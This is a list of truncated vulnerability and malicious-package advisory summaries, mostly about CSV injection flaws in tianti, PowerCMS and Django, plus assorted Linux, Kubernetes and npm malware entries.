CVE-2025-8808 xujeff tianti 天梯 com.jeff.tianti.controller save exportOrder csv injection

A vulnerability was found in xujeff tianti 天梯 up to 2.3. It has been rated as problematic. This issue affects the function exportOrder of the file /tianti-module-admin/user/ajax/save of the component com.jeff.tianti.controller. The manipulation leads to csv injection. The attack may be initiated...

PT-2025-32482 · Unknown · Xujeff Tianti 天梯

Name of the Vulnerable Software and Affected Versions: xujeff tianti 天梯 versions prior to 2.3 Description: A problematic issue exists in xujeff tianti 天梯. The exportOrder function within the /tianti-module-admin/user/ajax/save file of the com.jeff.tianti.controller component is susceptible to CSV...

Linux Distros Unpatched Vulnerability : CVE-2019-9793

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - A mechanism was discovered that removes some bounds checking for string, array, or typed array accesses if Spectre mitigations have been disabled. This...

tianti 安全漏洞

tianti tianti is a JAVA lightweight CMS solution by jeffry personal developer. A security vulnerability exists in tianti 2.3 and earlier versions, which originates from the function exportOrder in the file /tianti-module-admin/user/ajax/save resulting in a CSV injection that could lead to a remot...

Linux Distros Unpatched Vulnerability : CVE-2018-19665

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - The Bluetooth subsystem in QEMU mishandles negative values for length variables, leading to memory corruption. CVE-2018-19665 Note that Nessus relies on the...

PT-2025-32423 · Bun +4 · Bun +4

Name of the Vulnerable Software and Affected Versions: oak versions 17.1.5 and below Description: oak is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. Specially crafted values in the x-forwarded-proto or x-forwarded-for...

CVE-2025-2028

Lack of TLS validation when downloading a CSV file including mapping from IPs to countries used ONLY for displaying country flags in logs...

CuteFlow 安全漏洞

CuteFlow is a web-based document flow and workflow tool from CuteFlow, Inc. A security vulnerability exists in CuteFlow 2.11.2 and earlier versions, which stems from the restartcirculationvalueswrite.php script that does not validate the file type, which could lead to arbitrary file uploads and...

Linux Distros Unpatched Vulnerability : CVE-2025-7783

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Use of Insufficiently Random Values vulnerability in form-data allows HTTP Parameter Pollution HPP. This vulnerability is associated with program files...

kernel: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command

In the Linux kernel, the following vulnerability has been resolved: USB: usb-storage: Prevent divide-by-0 error in isd200atacommand The isd200 sub-driver in usb-storage uses the HEADS and SECTORS values in the ATA ID information to calculate cylinder and head values when creating a CDB for READ o...

Check Point Management Log Server 安全漏洞

Check Point Management Log Server is a log server from Check Point Israel. A security vulnerability exists in Check Point Management Log Server that stems from a lack of TLS authentication when downloading CSV files...

CLSA-2025-1754411479 Fix CVE(s): CVE-2025-48384

SECURITY UPDATE: security vulnerability - debian/patches/CVE-2025-48384.patch: quote values containing CR character in config to prevent unintended stripping of CR - CVE-2025-48384...

Malicious Package

Overview epic-fortnite-shared-values is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this...

SUSE-SU-2025:02350-2 Security update for kubernetes1.28

This update for kubernetes1.28 fixes the following issues: - CVE-2025-22872: Properly handle trailing solidus in unquoted attribute value in foreign content bsc1241865...

PYSEC-2025-183

pyjwt v2.10.1 was discovered to contain weak encryption. NOTE: this is disputed by the Supplier because the key length is chosen by the application that uses the library admittedly, library users may benefit from a minimum value and a mechanism for opting in to strict enforcement...

CVE-2025-54752

Multiple versions of PowerCMS improperly neutralize formula elements in a CSV file. If a product user creates a malformed entry and a victim user downloads it as a CSV file and opens it in the user's environment, the embedded code may be executed...

Alfasado PowerCMS 安全漏洞

Alfasado PowerCMS is a content management system CMS from Alfasado Japan. A security vulnerability exists in Alfasado PowerCMS that stems from improper handling of CSV files, which could lead to the execution of embedded code...

Malicious code in epic-fortnite-shared-values (npm)

The package communicates with a domain associated with malicious activity. --- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c1673c5a65d3d81e0cbfe67ef5df8558add71a1993f06838d744058afa38e3ce Any computer that has this package installed or running should be considered...

MAL-2025-6681 Malicious code in epic-fortnite-shared-values (npm)

The package communicates with a domain associated with malicious activity. --- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c1673c5a65d3d81e0cbfe67ef5df8558add71a1993f06838d744058afa38e3ce Any computer that has this package installed or running should be considered...

The vulnerability of the CSV file processor in the Django web development software platform allows a hacker to execute arbitrary code.

The vulnerability of the Django web application development platform’s CSV file processor is related to an incorrect path limitation for the restricted access directory. Exploiting this vulnerability allows a malicious actor to inject arbitrary code by introducing it into a specially crafted CSV...